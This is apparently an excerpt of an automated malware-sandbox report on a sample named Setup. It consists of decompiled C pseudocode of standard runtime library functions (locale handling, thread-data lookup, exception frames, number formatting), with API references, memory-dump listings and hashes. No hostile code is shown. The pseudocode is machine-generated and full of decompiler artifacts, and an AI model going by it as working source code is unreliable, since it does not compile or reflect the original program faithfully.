                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                                                                                                                                                              • String ID: L[E$bad cast
                                                                                                                                                                                              • API String ID: 3702371321-1828363520
                                                                                                                                                                                              • Opcode ID: bb7ca3d6a281ec73d8cc73b00387fabd72780f600c365691577ff6a9a7469f49
                                                                                                                                                                                              • Instruction ID: c96c4a021ff7d5cfeae90f08c3ea2d54e073d4025654ca610611e65ef4ca85d3
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb7ca3d6a281ec73d8cc73b00387fabd72780f600c365691577ff6a9a7469f49
                                                                                                                                                                                              • Instruction Fuzzy Hash: F2214F74D00208DBCB04EFA5D851AEEB7B0BF48305F10456FE91577291DB386E45CB99
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041EE80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0041EE80(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v36;
				intOrPtr _v40;
				char _t27;
				void* _t51;

				E00403A0C( &_v16, 0);
				_t27 =  *0x455b3c; // 0x1f310d8
				_v20 = _t27;
				_v12 = E0041EF40( &M00455D8C);
				_v8 = E0041EFB0(_a4, _v12);
				if(_v8 == 0) {
					if(_v20 == 0) {
						if(E0041F040(__ebx,  &_v20, _t51, __edi,  &_v20, _a4) != 0xffffffff) {
							_v8 = _v20;
							 *0x455b3c = _v20;
							_v24 = _v20;
							E0041DE30(_v24);
							E0041EF90(_v24);
						} else {
							E00405469( &_v36, "bad cast");
							E004052CB( &_v36, 0x427f38);
						}
					} else {
						_v8 = _v20;
					}
				}
				_v40 = _v8;
				E00403A34( &_v16);
				return _v40;
			}












                                                                                                                                                                                              0x0041ee8b
                                                                                                                                                                                              0x0041ee90
                                                                                                                                                                                              0x0041ee95
                                                                                                                                                                                              0x0041eea2
                                                                                                                                                                                              0x0041eeb1
                                                                                                                                                                                              0x0041eeb8
                                                                                                                                                                                              0x0041eec0
                                                                                                                                                                                              0x0041eedd
                                                                                                                                                                                              0x0041eeff
                                                                                                                                                                                              0x0041ef05
                                                                                                                                                                                              0x0041ef0e
                                                                                                                                                                                              0x0041ef14
                                                                                                                                                                                              0x0041ef1c
                                                                                                                                                                                              0x0041eedf
                                                                                                                                                                                              0x0041eee7
                                                                                                                                                                                              0x0041eef5
                                                                                                                                                                                              0x0041eef5
                                                                                                                                                                                              0x0041eec2
                                                                                                                                                                                              0x0041eec5
                                                                                                                                                                                              0x0041eec5
                                                                                                                                                                                              0x0041eec0
                                                                                                                                                                                              0x0041ef24
                                                                                                                                                                                              0x0041ef2a
                                                                                                                                                                                              0x0041ef35

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0041EE8B
                                                                                                                                                                                              • int.LIBCPMTD ref: 0041EE9D
                                                                                                                                                                                                • Part of subcall function 0041EF40: std::_Lockit::_Lockit.LIBCPMT ref: 0041EF56
                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMTD ref: 0041EEAC
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LockitLockit::_std::_$Getfacetstd::locale::_
                                                                                                                                                                                              • String ID: bad cast
                                                                                                                                                                                              • API String ID: 3702371321-3145022300
                                                                                                                                                                                              • Opcode ID: af19f4913b77b82bf28d93c36aa12f77bb64a393a276b57752412c56ad7239f0
                                                                                                                                                                                              • Instruction ID: 71236a24b764173651f70a716261a4f97af07607dfef97fea701329d14db5887
                                                                                                                                                                                              • Opcode Fuzzy Hash: af19f4913b77b82bf28d93c36aa12f77bb64a393a276b57752412c56ad7239f0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B210E78D00219EBCB04EFE6D951AEEB7B0BF48305F20456EE81577291DB386A41CB99
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00423600 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                                                              			E00423600(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char** _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				void* __ebx;
				void* __edi;
				char _t71;
				void* _t78;
				void* _t116;
				intOrPtr _t120;

				_push(0xffffffff);
				_push(E00423C10);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t120;
				_push(__ecx);
				_push(_t78);
				_push(_t116);
				_v20 = _t120 - 0x48;
				_v92 = __ecx;
				_v24 = E004237C0(_a4);
				 *((intOrPtr*)(_v92 + 8)) = 0;
				 *((intOrPtr*)(_v92 + 0x10)) = 0;
				 *((intOrPtr*)(_v92 + 0x14)) = 0;
				_v8 = 0;
				_push(E004235D0(_a4, _v92,  &_v32));
				_push(0);
				 *((intOrPtr*)(_v92 + 8)) = E004237F0(_t78, _v24[2], _t116, __eflags, _v24[2]);
				_push(E004235D0(_a4,  &_v40,  &_v40));
				_push(0);
				 *((intOrPtr*)(_v92 + 0x10)) = E004237F0(_t78,  &_v40, _t116, __eflags, E004237D0(_a4));
				_push(E004235D0(_a4,  &_v48,  &_v48));
				_push(0);
				 *((intOrPtr*)(_v92 + 0x14)) = E004237F0(_t78,  &_v48, _t116, __eflags, E004237E0(_a4));
				_v8 = 0xffffffff;
				_push(E004235D0(_a4,  &_v56,  &_v56));
				_push(0);
				 *((char*)(_v92 + 0xc)) = E00423390( *( *_v24) & 0x000000ff);
				_push(E004235D0(_a4,  &_v64,  &_v64));
				_push(0);
				_t71 = E00423390( *(_v24[1]) & 0x000000ff);
				 *((char*)(_v92 + 0xd)) = _t71;
				_t113 = _a8 & 0x000000ff;
				_t131 = _a8 & 0x000000ff;
				if((_a8 & 0x000000ff) != 0) {
					_push(E004235D0(_a4, _t113,  &_v72));
					_push(0);
					 *((intOrPtr*)(_v92 + 8)) = E004237F0(_t78, _t113, _t116, _t131, 0x424dec);
					_push(E004235D0(_a4,  &_v80,  &_v80));
					_push(0);
					 *((char*)(_v92 + 0xc)) = E00423390(0x2e);
					_push(E004235D0(_a4,  &_v88,  &_v88));
					_push(0);
					_t71 = E00423390(0x2c);
					 *((char*)(_v92 + 0xd)) = _t71;
				}
				 *[fs:0x0] = _v16;
				return _t71;
			}






















                                                                                                                                                                                              0x00423603
                                                                                                                                                                                              0x00423605
                                                                                                                                                                                              0x00423610
                                                                                                                                                                                              0x00423611
                                                                                                                                                                                              0x00423618
                                                                                                                                                                                              0x0042361c
                                                                                                                                                                                              0x0042361e
                                                                                                                                                                                              0x0042361f
                                                                                                                                                                                              0x00423622
                                                                                                                                                                                              0x0042362d
                                                                                                                                                                                              0x00423633
                                                                                                                                                                                              0x0042363d
                                                                                                                                                                                              0x00423647
                                                                                                                                                                                              0x0042364e
                                                                                                                                                                                              0x00423661
                                                                                                                                                                                              0x00423662
                                                                                                                                                                                              0x00423676
                                                                                                                                                                                              0x00423685
                                                                                                                                                                                              0x00423686
                                                                                                                                                                                              0x0042369c
                                                                                                                                                                                              0x004236ab
                                                                                                                                                                                              0x004236ac
                                                                                                                                                                                              0x004236c2
                                                                                                                                                                                              0x004236e5
                                                                                                                                                                                              0x004236f8
                                                                                                                                                                                              0x004236f9
                                                                                                                                                                                              0x0042370f
                                                                                                                                                                                              0x0042371e
                                                                                                                                                                                              0x0042371f
                                                                                                                                                                                              0x0042372b
                                                                                                                                                                                              0x00423736
                                                                                                                                                                                              0x00423739
                                                                                                                                                                                              0x0042373d
                                                                                                                                                                                              0x0042373f
                                                                                                                                                                                              0x0042374d
                                                                                                                                                                                              0x0042374e
                                                                                                                                                                                              0x00423760
                                                                                                                                                                                              0x0042376f
                                                                                                                                                                                              0x00423770
                                                                                                                                                                                              0x0042377f
                                                                                                                                                                                              0x0042378e
                                                                                                                                                                                              0x0042378f
                                                                                                                                                                                              0x00423793
                                                                                                                                                                                              0x0042379e
                                                                                                                                                                                              0x0042379e
                                                                                                                                                                                              0x004237a4
                                                                                                                                                                                              0x004237b1

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 004237C0: _localeconv.LIBCMT ref: 004237C7
                                                                                                                                                                                              • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0042365C
                                                                                                                                                                                                • Part of subcall function 004237F0: _strlen.LIBCMT ref: 004237FA
                                                                                                                                                                                              • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00423680
                                                                                                                                                                                              • std::_Locinfo::_Getcvt.LIBCPMTD ref: 004236A6
                                                                                                                                                                                              • std::_Locinfo::_Getcvt.LIBCPMTD ref: 004236F3
                                                                                                                                                                                              • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00423719
                                                                                                                                                                                              • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00423748
                                                                                                                                                                                              • std::_Locinfo::_Getcvt.LIBCPMTD ref: 0042376A
                                                                                                                                                                                              • std::_Locinfo::_Getcvt.LIBCPMTD ref: 00423789
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: GetcvtLocinfo::_std::_$_localeconv_strlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3869368768-0
                                                                                                                                                                                              • Opcode ID: fae334db0f18a89a7650daed19be231656c43d87531e3cd04f71085536c9722d
                                                                                                                                                                                              • Instruction ID: 94ebcd443a0f0d44f8288d8ffdedc4e2ab89b44f9baf22f7574f472e0d9c269a
                                                                                                                                                                                              • Opcode Fuzzy Hash: fae334db0f18a89a7650daed19be231656c43d87531e3cd04f71085536c9722d
                                                                                                                                                                                              • Instruction Fuzzy Hash: FD5171B4B00258ABCB04DF95D851FAEBB75AF84705F10811DF8099F381EB796B45CB98
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004082DC Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                              			E004082DC(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x428620);
				E0040D194(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00404FC1(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040BE6F(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040BE6F(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E0040BE6F(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E0040BE6F(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00405066(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00408402(_t48, _t53, _t55, _t57, _t61);
				return E0040D1D9( *((intOrPtr*)(_t58 - 0x1c)));
			}







                                                                                                                                                                                              0x004082dc
                                                                                                                                                                                              0x004082dc
                                                                                                                                                                                              0x004082dc
                                                                                                                                                                                              0x004082de
                                                                                                                                                                                              0x004082e3
                                                                                                                                                                                              0x004082e8
                                                                                                                                                                                              0x004082ea
                                                                                                                                                                                              0x004082ed
                                                                                                                                                                                              0x004082f0
                                                                                                                                                                                              0x004082f3
                                                                                                                                                                                              0x004082fa
                                                                                                                                                                                              0x0040830b
                                                                                                                                                                                              0x00408319
                                                                                                                                                                                              0x00408327
                                                                                                                                                                                              0x0040832f
                                                                                                                                                                                              0x0040833d
                                                                                                                                                                                              0x00408343
                                                                                                                                                                                              0x0040834a
                                                                                                                                                                                              0x0040834d
                                                                                                                                                                                              0x00408363
                                                                                                                                                                                              0x00408366
                                                                                                                                                                                              0x004083db
                                                                                                                                                                                              0x004083e2
                                                                                                                                                                                              0x004083e9
                                                                                                                                                                                              0x004083f6

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 00408304
                                                                                                                                                                                                • Part of subcall function 00404FC1: __getptd.LIBCMT ref: 00404FCF
                                                                                                                                                                                                • Part of subcall function 00404FC1: __getptd.LIBCMT ref: 00404FDD
                                                                                                                                                                                              • __getptd.LIBCMT ref: 0040830E
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __getptd_noexit.LIBCMT ref: 0040BE72
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __amsg_exit.LIBCMT ref: 0040BE7F
                                                                                                                                                                                              • __getptd.LIBCMT ref: 0040831C
                                                                                                                                                                                              • __getptd.LIBCMT ref: 0040832A
                                                                                                                                                                                              • __getptd.LIBCMT ref: 00408335
                                                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 0040835B
                                                                                                                                                                                                • Part of subcall function 00405066: __CallSettingFrame@12.LIBCMT ref: 004050B2
                                                                                                                                                                                                • Part of subcall function 00408402: __getptd.LIBCMT ref: 00408411
                                                                                                                                                                                                • Part of subcall function 00408402: __getptd.LIBCMT ref: 0040841F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                                                              • Opcode ID: b0d027882fc9906b8c32cd4ff9686217be2c2889717a01d2b8569a7fc354883c
                                                                                                                                                                                              • Instruction ID: 2f5569ed450a46d0503ee348422b253373c935af641da98d21c2e7e6c1e5ca5d
                                                                                                                                                                                              • Opcode Fuzzy Hash: b0d027882fc9906b8c32cd4ff9686217be2c2889717a01d2b8569a7fc354883c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A110AB1C00209DFDB00EFA5D545ADD7BB1FF04314F10806EF814A7291DB399A159F98
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410EAE Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E00410EAE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x4289b0);
				E0040D194(__ebx, __edi, __esi);
				_t31 = E0040BE6F(__ebx, __edx, __edi, _t35);
				_t15 =  *0x454cb0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040C69C(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x4553b0; // 0x1f31640
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x454f88;
								if(__eflags != 0) {
									_push(_t33);
									E004055FF(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x4553b0; // 0x1f31640
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x4553b0; // 0x1f31640
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00410F49();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040DB05(_t29, _t31, 0x20);
				}
				return E0040D1D9(_t33);
			}










                                                                                                                                                                                              0x00410eae
                                                                                                                                                                                              0x00410eae
                                                                                                                                                                                              0x00410eae
                                                                                                                                                                                              0x00410eae
                                                                                                                                                                                              0x00410eb0
                                                                                                                                                                                              0x00410eb5
                                                                                                                                                                                              0x00410ebf
                                                                                                                                                                                              0x00410ec1
                                                                                                                                                                                              0x00410ec9
                                                                                                                                                                                              0x00410eea
                                                                                                                                                                                              0x00410ef0
                                                                                                                                                                                              0x00410ef4
                                                                                                                                                                                              0x00410ef7
                                                                                                                                                                                              0x00410efa
                                                                                                                                                                                              0x00410f00
                                                                                                                                                                                              0x00410f02
                                                                                                                                                                                              0x00410f04
                                                                                                                                                                                              0x00410f07
                                                                                                                                                                                              0x00410f0d
                                                                                                                                                                                              0x00410f0f
                                                                                                                                                                                              0x00410f11
                                                                                                                                                                                              0x00410f17
                                                                                                                                                                                              0x00410f19
                                                                                                                                                                                              0x00410f1a
                                                                                                                                                                                              0x00410f1f
                                                                                                                                                                                              0x00410f17
                                                                                                                                                                                              0x00410f0f
                                                                                                                                                                                              0x00410f20
                                                                                                                                                                                              0x00410f25
                                                                                                                                                                                              0x00410f28
                                                                                                                                                                                              0x00410f2e
                                                                                                                                                                                              0x00410f32
                                                                                                                                                                                              0x00410f32
                                                                                                                                                                                              0x00410f38
                                                                                                                                                                                              0x00410f3f
                                                                                                                                                                                              0x00410ed1
                                                                                                                                                                                              0x00410ed1
                                                                                                                                                                                              0x00410ed1
                                                                                                                                                                                              0x00410ed6
                                                                                                                                                                                              0x00410eda
                                                                                                                                                                                              0x00410edf
                                                                                                                                                                                              0x00410ee7

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __getptd.LIBCMT ref: 00410EBA
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __getptd_noexit.LIBCMT ref: 0040BE72
                                                                                                                                                                                                • Part of subcall function 0040BE6F: __amsg_exit.LIBCMT ref: 0040BE7F
                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00410EDA
                                                                                                                                                                                              • __lock.LIBCMT ref: 00410EEA
                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00410F07
                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(01F31640), ref: 00410F32
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4271482742-0
                                                                                                                                                                                              • Opcode ID: 8f5d7ced944c3bada745e34e838d249a7e9a7cde3e85eed13b4ebc4b578fa380
                                                                                                                                                                                              • Instruction ID: 2992929934358dc7124874a66166ebcb8f2fa7cfce442e31165792a128c3651e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f5d7ced944c3bada745e34e838d249a7e9a7cde3e85eed13b4ebc4b578fa380
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0901A132A01711ABC721AB66980679E7760FB04765F01006BF804B73D5CBBCA9C2CBDD
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00420550 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                                                              			E00420550(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed char _a20, signed int _a24) {
				signed char _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				long _v132;
				char _v140;
				intOrPtr _v144;
				signed int _v145;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed char _v164;
				signed char _t81;
				void* _t95;
				signed int _t109;
				void* _t120;
				void* _t121;
				void* _t122;

				_t121 = __esi;
				_t120 = __edi;
				_t95 = __ebx;
				_v152 = __ecx;
				_v20 = 0x6c;
				if(E00420770(_a16) > 0 || (E0041DDC0(_a16) & 0x00002000) != 0) {
					_v156 = E00420770(_a16);
				} else {
					_v156 = 6;
				}
				_v16 = _v156;
				if(_v16 <= 0x24) {
					_v160 = _v16;
				} else {
					_v160 = 0x24;
				}
				_v144 = _v160;
				_v16 = _v16 - _v144;
				_v8 = 0;
				_v12 = 0;
				_t81 = E0041DDC0(_a16) & 0x00003000;
				if(_t81 == 0x2000) {
					asm("fcomp qword [ebp+0x1c]");
					asm("fnstsw ax");
					if((_t81 & 0x00000044) == 0) {
						asm("fldz");
						asm("fcomp qword [ebp+0x1c]");
						asm("fnstsw ax");
						if((_t81 & 0x00000041) != 0) {
							_v164 = 0;
						} else {
							_v164 = 1;
						}
						_v145 = _v164;
						if((_v145 & 0x000000ff) != 0) {
							asm("fchs");
						}
						while(1) {
							asm("fcomp qword [0x424d60]");
							asm("fnstsw ax");
							if((_t81 & 0x00000001) != 0 || _v8 >= 0x1388) {
								break;
							}
							_a24 = _a24 /  *0x424d58;
							_t81 = _v8 + 0xa;
							_v8 = _t81;
						}
						asm("fcomp qword [0x424d68]");
						asm("fnstsw ax");
						__eflags = _t81 & 0x00000041;
						if((_t81 & 0x00000041) == 0) {
							while(1) {
								__eflags = _v16 - 0xa;
								if(_v16 < 0xa) {
									goto L26;
								}
								asm("fcomp qword [ebp+0x1c]");
								asm("fnstsw ax");
								__eflags = _t81 & 0x00000001;
								if((_t81 & 0x00000001) == 0) {
									__eflags = _v12 - 0x1388;
									if(_v12 < 0x1388) {
										_a24 = _a24 *  *0x424d58;
										_v16 = _v16 - 0xa;
										_t109 = _v12 + 0xa;
										__eflags = _t109;
										_v12 = _t109;
										continue;
									}
								}
								goto L26;
							}
						}
						L26:
						__eflags = _v145 & 0x000000ff;
						if((_v145 & 0x000000ff) != 0) {
							asm("fchs");
						}
					}
				}
				 *(_t122 - 8) = _a24;
				_push(_v144);
				E00420B30(_t95, _t120, _t121, __eflags, _v152, _a4, _a8, _a12, _a16, _a20 & 0x000000ff,  &_v132, _v8, _v12, _v16, swprintf( &_v132, 0x6c, E00420A50(_v152,  &_v140, 0, E0041DDC0(_a16))));
				return _a4;
			}





















                                                                                                                                                                                              0x00420550
                                                                                                                                                                                              0x00420550
                                                                                                                                                                                              0x00420550
                                                                                                                                                                                              0x00420559
                                                                                                                                                                                              0x0042055f
                                                                                                                                                                                              0x00420570
                                                                                                                                                                                              0x00420595
                                                                                                                                                                                              0x00420581
                                                                                                                                                                                              0x00420581
                                                                                                                                                                                              0x00420581
                                                                                                                                                                                              0x004205a1
                                                                                                                                                                                              0x004205a8
                                                                                                                                                                                              0x004205b9
                                                                                                                                                                                              0x004205aa
                                                                                                                                                                                              0x004205aa
                                                                                                                                                                                              0x004205aa
                                                                                                                                                                                              0x004205c5
                                                                                                                                                                                              0x004205d4
                                                                                                                                                                                              0x004205d7
                                                                                                                                                                                              0x004205de
                                                                                                                                                                                              0x004205ed
                                                                                                                                                                                              0x004205f7
                                                                                                                                                                                              0x00420606
                                                                                                                                                                                              0x00420609
                                                                                                                                                                                              0x0042060e
                                                                                                                                                                                              0x00420614
                                                                                                                                                                                              0x00420616
                                                                                                                                                                                              0x00420619
                                                                                                                                                                                              0x0042061e
                                                                                                                                                                                              0x0042062c
                                                                                                                                                                                              0x00420620
                                                                                                                                                                                              0x00420620
                                                                                                                                                                                              0x00420620
                                                                                                                                                                                              0x0042063c
                                                                                                                                                                                              0x0042064b
                                                                                                                                                                                              0x00420650
                                                                                                                                                                                              0x00420652
                                                                                                                                                                                              0x00420660
                                                                                                                                                                                              0x00420663
                                                                                                                                                                                              0x00420669
                                                                                                                                                                                              0x0042066e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00420682
                                                                                                                                                                                              0x0042065a
                                                                                                                                                                                              0x0042065d
                                                                                                                                                                                              0x0042065d
                                                                                                                                                                                              0x0042068a
                                                                                                                                                                                              0x00420690
                                                                                                                                                                                              0x00420692
                                                                                                                                                                                              0x00420695
                                                                                                                                                                                              0x004206a2
                                                                                                                                                                                              0x004206a2
                                                                                                                                                                                              0x004206a6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004206ae
